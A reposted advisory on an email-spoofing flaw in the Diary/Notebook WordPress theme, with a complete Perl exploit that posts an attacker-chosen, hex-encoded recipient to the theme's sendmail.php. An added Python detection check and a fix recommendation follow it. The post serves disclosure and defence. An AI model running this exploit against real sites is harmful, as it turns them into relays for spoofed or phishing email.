
WordPress Diary/Notebook Theme Email Spoofing Vulnerability

Time: 2013/4/19 12:09:00  Author: 平凡之路  Source: xuhantao.com

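The Diary/Notebook theme for WordPress is a personal diary blog theme designed by site5. An email spoofing vulnerability in it was disclosed recently. The Perl exploit script is attached: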

#!/usr/bin/perl
# Exploit Title: Diary/Notebook Site5 WordPress Theme - Email Spoofing
# Date: 15.07.2012
# Exploit Author: @bwallHatesTwits
# Discovered by: @xxDigiPxx ()
# Software Link:
# Vendor Homepage:
# Others Possibly Vulnerable:
# Version: Not Documented
# Tested on: Linux 3.2
use strict;
use warnings;
use LWP::UserAgent;
use HTTP::Request::Common qw{ POST };

#Change this to the root of the WordPress
my $wordpress = '';
my $url = $wordpress.'wp-content/themes/diary/sendmail.php';

#Name shows up in the topic of the email (Website contact message from name)
my $name = 'Proof of Concept';
#Sender email address
my $email = 'sender@mail.com';
#Content of the email
my $comment = 'Email content';
#Receiver email address
my $receiver = 'receiver@mail.com';
#Hex-encode each character of the receiver address before it is posted
$receiver =~ s/(.)/sprintf("%x",ord($1))/eg;

my $ua = LWP::UserAgent->new();
my $request = POST( $url, [ name => $name, email => $email, comment => $comment, receiver => $receiver, submit => 'submit', ] );
print "Sending request to $url\n";
my $content = $ua->request($request)->as_string();
print $content;
print "\nDone\nFollow \@BallastSec on Twitter\n";

Author: 牛X阿德玛, 涛涛电脑知识网
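
For defenders, a detection check for the request the script above sends. This is an added example, not code from the original post or from the theme. It assumes request bodies are available (for instance from a WAF audit log) and that the site's legitimate recipient addresses are known. The names check_request, decode_receiver, sample_body and ALLOWED_RECEIVERS are hypothetical.

```python
from urllib.parse import parse_qs, urlencode

# Handler path taken from the exploit on this page.
SENDMAIL_PATH = "wp-content/themes/diary/sendmail.php"
# Assumption: addresses this site legitimately mails contact messages to.
ALLOWED_RECEIVERS = {"owner@example.org"}


def decode_receiver(hex_value):
    """Undo the per-character hex encoding the script applies; None if invalid."""
    try:
        return bytes.fromhex(hex_value).decode("ascii")
    except ValueError:  # odd length, non-hex digits, or non-ASCII bytes
        return None


def check_request(method, path, body, allowed=ALLOWED_RECEIVERS):
    """Return a finding dict for a suspicious POST to sendmail.php, else None."""
    if method != "POST" or not path.split("?", 1)[0].endswith(SENDMAIL_PATH):
        return None
    fields = parse_qs(body, keep_blank_values=True)
    if "receiver" not in fields:
        return None
    raw = fields["receiver"][0]
    receiver = decode_receiver(raw)
    if receiver is None:
        return {"reason": "receiver is not valid hex", "receiver": raw}
    if receiver.lower() not in allowed:
        return {"reason": "receiver outside allow-list", "receiver": receiver,
                "claimed_sender": fields.get("email", [""])[0]}
    return None


def sample_body(receiver):
    """Constructed sample: form body shaped like the one the script posts."""
    return urlencode({"name": "test", "email": "sender@mail.com",
                      "comment": "hello", "receiver": receiver.encode().hex(),
                      "submit": "submit"})


if __name__ == "__main__":
    path = "/" + SENDMAIL_PATH
    for rcpt in ("owner@example.org", "receiver@mail.com"):
        print(rcpt, "->", check_request("POST", path, sample_body(rcpt)))
```

Detection only reports abuse. The durable fix is for the server-side handler to take the recipient from site configuration instead of from the request.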
